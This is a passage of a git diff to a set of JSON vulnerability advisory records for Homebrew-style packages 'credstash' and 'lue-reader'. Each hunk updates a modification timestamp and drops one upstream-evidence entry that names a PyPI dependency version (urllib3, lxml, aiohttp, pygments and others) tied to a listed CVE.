b/advisories/BREW-credstash-CVE-2025-50182.json index 46ffa51913..7a4f560a8e 100644 --- a/advisories/BREW-credstash-CVE-2025-50182.json +++ b/advisories/BREW-credstash-CVE-2025-50182.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-credstash-CVE-2025-50182", "published": "2026-08-13T16:41:15Z", - "modified": "2026-08-13T16:41:15Z", + "modified": "2026-09-10T19:02:03Z", "upstream": [ "GHSA-48p4-8xcf-vxj5", "CVE-2025-50182", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-credstash-CVE-2025-66418.json b/advisories/BREW-credstash-CVE-2025-66418.json index 62101c3947..23a4ca4713 100644 --- a/advisories/BREW-credstash-CVE-2025-66418.json +++ b/advisories/BREW-credstash-CVE-2025-66418.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-credstash-CVE-2025-66418", "published": "2026-08-13T16:41:15Z", - "modified": "2026-08-13T16:41:15Z", + "modified": "2026-09-10T19:02:03Z", "upstream": [ "GHSA-gm62-xv2j-4w53", "CVE-2025-66418", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-credstash-CVE-2025-66471.json b/advisories/BREW-credstash-CVE-2025-66471.json index e941c62df4..b20ee024f2 100644 --- a/advisories/BREW-credstash-CVE-2025-66471.json +++ b/advisories/BREW-credstash-CVE-2025-66471.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-credstash-CVE-2025-66471", "published": "2026-08-13T16:41:15Z", - "modified": "2026-08-13T16:41:15Z", + "modified": "2026-09-10T19:02:03Z", "upstream": [ "GHSA-2xpw-w6gg-jr37", "CVE-2025-66471", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-credstash-CVE-2026-21441.json b/advisories/BREW-credstash-CVE-2026-21441.json index 9b1c072a3b..16de0209ac 100644 --- a/advisories/BREW-credstash-CVE-2026-21441.json +++ b/advisories/BREW-credstash-CVE-2026-21441.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-credstash-CVE-2026-21441", "published": "2026-08-13T16:41:15Z", - "modified": "2026-08-13T16:41:15Z", + "modified": "2026-09-10T19:02:03Z", "upstream": [ "GHSA-38jv-5279-wg99", "CVE-2026-21441", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-credstash-CVE-2026-44431.json b/advisories/BREW-credstash-CVE-2026-44431.json index bf9fe78697..b90fc0d555 100644 --- a/advisories/BREW-credstash-CVE-2026-44431.json +++ b/advisories/BREW-credstash-CVE-2026-44431.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-credstash-CVE-2026-44431", "published": "2026-08-13T16:41:15Z", - "modified": "2026-08-13T16:41:15Z", + "modified": "2026-09-10T19:02:03Z", "upstream": [ "GHSA-qccp-gfcp-xxvc", "CVE-2026-44431", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-credstash-CVE-2026-44432.json b/advisories/BREW-credstash-CVE-2026-44432.json index 890ee57e4d..1a1768e106 100644 --- a/advisories/BREW-credstash-CVE-2026-44432.json +++ b/advisories/BREW-credstash-CVE-2026-44432.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-credstash-CVE-2026-44432", "published": "2026-08-13T16:41:15Z", - "modified": "2026-08-13T16:41:15Z", + "modified": "2026-09-10T19:02:03Z", "upstream": [ "GHSA-mf9v-mfxr-j63j", "CVE-2026-44432", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2014-3146.json b/advisories/BREW-lue-reader-CVE-2014-3146.json index 5b76ca7d04..b4e3dfd354 100644 --- a/advisories/BREW-lue-reader-CVE-2014-3146.json +++ b/advisories/BREW-lue-reader-CVE-2014-3146.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2014-3146", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-57qw-cc2g-pv5p", "CVE-2014-3146", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2015-8557.json b/advisories/BREW-lue-reader-CVE-2015-8557.json index 79958fe650..967c6fcd92 100644 --- a/advisories/BREW-lue-reader-CVE-2015-8557.json +++ b/advisories/BREW-lue-reader-CVE-2015-8557.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2015-8557", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-fff8-4w9p-7v76", "CVE-2015-8557", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2016-5851.json b/advisories/BREW-lue-reader-CVE-2016-5851.json index c836376562..8b49ebe251 100644 --- a/advisories/BREW-lue-reader-CVE-2016-5851.json +++ b/advisories/BREW-lue-reader-CVE-2016-5851.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2016-5851", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-34wj-p5jm-2p96", "CVE-2016-5851", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-docx", - "subject_version": "1.2.0", - "key": "pkg:pypi/python-docx@1.2.0", - "resource": "python-docx" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2018-19787.json b/advisories/BREW-lue-reader-CVE-2018-19787.json index d7a78e4452..20dbaa0161 100644 --- a/advisories/BREW-lue-reader-CVE-2018-19787.json +++ b/advisories/BREW-lue-reader-CVE-2018-19787.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2018-19787", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-xp26-p53h-6h2p", "CVE-2018-19787", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2020-27783.json b/advisories/BREW-lue-reader-CVE-2020-27783.json index cb31fdeac1..9db1a45941 100644 --- a/advisories/BREW-lue-reader-CVE-2020-27783.json +++ b/advisories/BREW-lue-reader-CVE-2020-27783.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2020-27783", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-pgww-xf46-h92r", "CVE-2020-27783", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2021-20270.json b/advisories/BREW-lue-reader-CVE-2021-20270.json index e237b6e3e5..a19b634500 100644 --- a/advisories/BREW-lue-reader-CVE-2021-20270.json +++ b/advisories/BREW-lue-reader-CVE-2021-20270.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2021-20270", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-9w8r-397f-prfh", "CVE-2021-20270", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2021-21330.json b/advisories/BREW-lue-reader-CVE-2021-21330.json index 65783ca44b..f9921b1e34 100644 --- a/advisories/BREW-lue-reader-CVE-2021-21330.json +++ b/advisories/BREW-lue-reader-CVE-2021-21330.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2021-21330", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-v6wp-4m6f-gcjg", "CVE-2021-21330", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2021-27291.json b/advisories/BREW-lue-reader-CVE-2021-27291.json index b73a17b8d5..e14cc2bb05 100644 --- a/advisories/BREW-lue-reader-CVE-2021-27291.json +++ b/advisories/BREW-lue-reader-CVE-2021-27291.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2021-27291", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-pq64-v7f5-gqh8", "CVE-2021-27291", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2021-28957.json b/advisories/BREW-lue-reader-CVE-2021-28957.json index ada88719a6..c73a7c4ed2 100644 --- a/advisories/BREW-lue-reader-CVE-2021-28957.json +++ b/advisories/BREW-lue-reader-CVE-2021-28957.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2021-28957", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-jq4v-f5q6-mjqq", "CVE-2021-28957", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2021-43818.json b/advisories/BREW-lue-reader-CVE-2021-43818.json index 1188920993..b905a236c3 100644 --- a/advisories/BREW-lue-reader-CVE-2021-43818.json +++ b/advisories/BREW-lue-reader-CVE-2021-43818.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2021-43818", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-55x5-fj6c-h6m8", "CVE-2021-43818", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2022-2309.json b/advisories/BREW-lue-reader-CVE-2022-2309.json index 23f2f0ec5d..505af3ce1b 100644 --- a/advisories/BREW-lue-reader-CVE-2022-2309.json +++ b/advisories/BREW-lue-reader-CVE-2022-2309.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2022-2309", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-wrxv-2j5q-m38w", "CVE-2022-2309", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2022-40896.json b/advisories/BREW-lue-reader-CVE-2022-40896.json index 412b7061a2..a1f25ca03a 100644 --- a/advisories/BREW-lue-reader-CVE-2022-40896.json +++ b/advisories/BREW-lue-reader-CVE-2022-40896.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2022-40896", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-mrwq-x4v8-fh7p", "CVE-2022-40896", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2023-26302.json b/advisories/BREW-lue-reader-CVE-2023-26302.json index a115346dd7..2cc29e8659 100644 --- a/advisories/BREW-lue-reader-CVE-2023-26302.json +++ b/advisories/BREW-lue-reader-CVE-2023-26302.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2023-26302", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-jrwr-5x3p-hvc3", "CVE-2023-26302", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "markdown-it-py", - "subject_version": "4.2.0", - "key": "pkg:pypi/markdown-it-py@4.2.0", - "resource": "markdown-it-py" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2023-26303.json b/advisories/BREW-lue-reader-CVE-2023-26303.json index 77e7e6b28b..53d70e96c1 100644 --- a/advisories/BREW-lue-reader-CVE-2023-26303.json +++ b/advisories/BREW-lue-reader-CVE-2023-26303.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2023-26303", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-vrjv-mxr7-vjf8", "CVE-2023-26303", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "markdown-it-py", - "subject_version": "4.2.0", - "key": "pkg:pypi/markdown-it-py@4.2.0", - "resource": "markdown-it-py" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2023-37276.json b/advisories/BREW-lue-reader-CVE-2023-37276.json index b9b0aab9ef..b3533ef4c7 100644 --- a/advisories/BREW-lue-reader-CVE-2023-37276.json +++ b/advisories/BREW-lue-reader-CVE-2023-37276.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2023-37276", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-45c4-8wx5-qw6w", "CVE-2023-37276", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2023-47627.json b/advisories/BREW-lue-reader-CVE-2023-47627.json index 0212a4e393..2aedaeb9bb 100644 --- a/advisories/BREW-lue-reader-CVE-2023-47627.json +++ b/advisories/BREW-lue-reader-CVE-2023-47627.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2023-47627", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-gfw2-4jvh-wgfg", "CVE-2023-47627", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2023-47641.json b/advisories/BREW-lue-reader-CVE-2023-47641.json index 310b6fae42..5868263abc 100644 --- a/advisories/BREW-lue-reader-CVE-2023-47641.json +++ b/advisories/BREW-lue-reader-CVE-2023-47641.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2023-47641", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-xx9p-xxvh-7g8j", "CVE-2023-47641", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2023-49081.json b/advisories/BREW-lue-reader-CVE-2023-49081.json index 0a6bb65935..2699aa2693 100644 --- a/advisories/BREW-lue-reader-CVE-2023-49081.json +++ b/advisories/BREW-lue-reader-CVE-2023-49081.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2023-49081", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-q3qx-c6g2-7pw2", "CVE-2023-49081", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2023-49082.json b/advisories/BREW-lue-reader-CVE-2023-49082.json index b8c8959b68..b493e057d5 100644 --- a/advisories/BREW-lue-reader-CVE-2023-49082.json +++ b/advisories/BREW-lue-reader-CVE-2023-49082.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2023-49082", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-qvrw-v9rv-5rjx", "CVE-2023-49082", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2024-23334.json b/advisories/BREW-lue-reader-CVE-2024-23334.json index a849c2eeb7..c6d8d160c3 100644 --- a/advisories/BREW-lue-reader-CVE-2024-23334.json +++ b/advisories/BREW-lue-reader-CVE-2024-23334.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2024-23334", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-5h86-8mv2-jq9f", "CVE-2024-23334", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2024-23829.json b/advisories/BREW-lue-reader-CVE-2024-23829.json index 828692dd99..f2bbc10510 100644 --- a/advisories/BREW-lue-reader-CVE-2024-23829.json +++ b/advisories/BREW-lue-reader-CVE-2024-23829.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2024-23829", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-8qpw-xqxj-h4r2", "CVE-2024-23829", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2024-27306.json b/advisories/BREW-lue-reader-CVE-2024-27306.json index 815825e830..cd67340bb6 100644 --- a/advisories/BREW-lue-reader-CVE-2024-27306.json +++ b/advisories/BREW-lue-reader-CVE-2024-27306.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2024-27306", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-7gpw-8wmc-pm8g", "CVE-2024-27306", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2024-30251.json b/advisories/BREW-lue-reader-CVE-2024-30251.json index 7bf5052158..64e211994a 100644 --- a/advisories/BREW-lue-reader-CVE-2024-30251.json +++ b/advisories/BREW-lue-reader-CVE-2024-30251.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2024-30251", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-5m98-qgg9-wh84", "CVE-2024-30251", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2024-3651.json b/advisories/BREW-lue-reader-CVE-2024-3651.json index f93c33983f..405e3d7957 100644 --- a/advisories/BREW-lue-reader-CVE-2024-3651.json +++ b/advisories/BREW-lue-reader-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2024-3651", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2024-42367.json b/advisories/BREW-lue-reader-CVE-2024-42367.json index b3a0d3dc64..bba1f5fe23 100644 --- a/advisories/BREW-lue-reader-CVE-2024-42367.json +++ b/advisories/BREW-lue-reader-CVE-2024-42367.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2024-42367", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-jwhx-xcg6-8xhj", "CVE-2024-42367", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2024-52303.json b/advisories/BREW-lue-reader-CVE-2024-52303.json index 82b0df3e07..b4196867c7 100644 --- a/advisories/BREW-lue-reader-CVE-2024-52303.json +++ b/advisories/BREW-lue-reader-CVE-2024-52303.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2024-52303", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-27mf-ghqm-j3j8", "CVE-2024-52303", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2024-52304.json b/advisories/BREW-lue-reader-CVE-2024-52304.json index 1bc4ac07b4..6a12fc4b55 100644 --- a/advisories/BREW-lue-reader-CVE-2024-52304.json +++ b/advisories/BREW-lue-reader-CVE-2024-52304.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2024-52304", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-8495-4g3g-x7pr", "CVE-2024-52304", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2025-53643.json b/advisories/BREW-lue-reader-CVE-2025-53643.json index 1e26d6b49d..715516a603 100644 --- a/advisories/BREW-lue-reader-CVE-2025-53643.json +++ b/advisories/BREW-lue-reader-CVE-2025-53643.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2025-53643", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-9548-qrrj-x5pj", "CVE-2025-53643", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": 